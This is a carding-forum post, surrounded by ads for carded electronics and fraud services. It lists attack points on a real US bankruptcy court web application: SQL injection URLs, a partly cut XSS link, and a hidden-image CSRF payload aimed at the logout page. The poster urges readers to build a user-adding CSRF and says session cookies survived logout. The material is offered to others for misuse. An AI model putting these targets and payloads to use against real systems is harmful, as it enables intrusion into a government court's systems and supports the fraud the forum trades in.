We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
[SQLi/XSS/CSRF]-www2.vaeb.uscourts.gov/

#1
Have fun guise Smile

SQLi:

www2.vaeb.uscourts.gov/oz/index.php?t=tinf&id=2340'
www2.vaeb.uscourts.gov/oz/supporter/print.php?id=[SQLi]


XSS:

https://www2.vaeb.uscourts.gov/oz/index..../script%3E


CSRF:


<html>
<body>
<img style="display:none;" src="[url="https://www2.vaeb.uscourts.gov/oz/common/logout.php%22>"]https://www2.vaeb.usc...on/logout.php">[/url]
</body>
</html>


About the CSRF: Don't have time to spend on it but sure you can try to make one to add users, it was based on POST request so, if there are no tokens(I'm pretty sure there aren't any) you can make it possible.

Ohh and a few months back their cookie sessions were still alive even tho you log out so check that out.

Cheers....
Reply
Paid adv. expire in 31 days
CLICK to buy Advertisement !

    Verified & Trusted Thread-Verified-SELLING-Carded-iPhone-X-XS-Max-Samsung-MacBook-Laptops-TV




Forum Jump: